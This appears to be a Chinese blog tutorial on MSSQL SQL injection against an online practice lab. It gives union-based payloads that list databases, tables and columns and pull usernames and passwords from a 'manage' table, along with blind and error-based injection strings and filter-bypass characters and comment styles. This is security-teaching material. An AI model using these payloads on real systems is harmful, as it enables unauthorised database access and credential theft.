0x00 前言
上篇文章写了mssql的查询方式与mssql 和mysql的区别。在注入当中也是有些区别的。下面直接来看到几种mssql注入的方法与特性,绕过方式。因为mssql加aspx的站懒得搭建,所以这里直接拿墨者的在线靶机做测试。
0x01 mssql 联合查询
这里输入单引号报错了 ,初步判断存在注入。
and 1=1 正常 and 1=2 报错
order by 10 报错 order by 5 报错 order by 4 正常
and 1=2 union select null,null,null,null 报错
这里报错了 ,可能是union select 函数被禁用了
and 1=2 union all select null,null,null,null
and 1=2 union all select 'null,null,null,null and 1=2 union all select null,'null',null,null and 1=2 union all select null,null,'null',null and 1=2 union all select null,null,null,'null'
在第二和第三位置是可以回显数据的,我们就在 二和三的位置来查询数据
and 1=2 union all select null,@@version,'null',null
查询版本为2005的版本, 能正常查询,这时候就可以去爆我们的数据。
and 1=2 union all select null,db_name(),'null',null 查看当前数据库 and 1=2 union all select null,db_name(1),'null',null 查看第一个数据库 and 1=2 union all select null,db_name(2),'null',null 查看第二个数据库 and 1=2 union all select null,db_name(3),'null',null 查看第三个数据库 and 1=2 union all select null,db_name(4),'null',null 查看第四个数据库 and 1=2 union all select null,db_name(5),'null',null 查看第五个数据库 and 1=2 union all select null,db_name(6),'null',null 查询失败
这也是个mysql不一样的地方,可以直接输入db_name ()里面添加参数,直接遍历数据库名。
and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype ='u'),'null',null
top是取值 ,查询到的第一行数据,那么如果我们想爆第二表呢,在mssql里面没有 limit这个函数。
xtpye =’u’ 这个是我们指定查询的条件,查询他自定义的表
-2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype ='u' and name <>('manage')),null,null
这里直接指定查询条件为name 不等于manage 然后爆出他的第二张表 如果后面还需要查询的话也是同样的方式。
union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype ='u' and name <>('manage') and name<>('announcement')),null,null
union all select null,(select top 1 col_name(object_id('manage'),1)from sysobjects),null,null
union all select null,(select top 1 col_name(object_id('manage'),2)from sysobjects),null,null
union all select null,(select top 1 col_name(object_id('manage'),3)from sysobjects),null,null
分别显示了 id ,username ,password 。
column_id列的标识号。 column_id 自变量具有一个 int 数据类型 。
union all select null,(select top 1 username from manage),null,null union all select null,(select top 1 password from manage),null,null
0x02 mssql 盲注
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A'
用取值函数来取information_schema.table 里面的值,这个数据库在我们mssql中是个视图,而不是真正的数据库。
AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns = 'A'
0x03 mssql 报错注入
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)
如果想查询第二张表的话可以利用到前面的方式 name不等于 第一张表
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))
这里和前面说到的差不多,这个的意思是查询第一条数据 然后不在第一张表里面查询,那么就可以爆出我们的第二张表。想爆第三张表也是一样。
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 2 table_name FROM information_schema.tables))
不在前面2张表进行查询。 那么查询第一行数据就是第三表的数据。
0x04 mssql 特性
01 Start of Heading 02 Start of Text 03 End of Text 04 End of Transmission 05 Enquiry 06 Acknowledge 07 Bell 08 Backspace 09 Horizontal Tab 0A New Line 0B Vertical Tab 0C New Page 0D Carriage Return 0E Shift Out 0F Shift In 10 Data Link Escape 11 Device Control 1 12 Device Control 2 13 Device Control 3 14 Device Control 4 15 Negative Acknowledge 16 Synchronous Idle 17 End of Transmission Block 18 Cancel 19 End of Medium 1A Substitute 1B Escape 1C File Separator 1D Group Separator 1E Record Separator 1F Unit Separator 20 Space 25 %
and 和or 后的中间替代字符
01-20 范围 21 ! 2B + 2D -- 2E 。 5C \ 7E 〜
mssql 注释方式:
/**/ c语言注释
— sql注释
0x03 结尾
本次文章耗时 2小时。记录快乐时刻。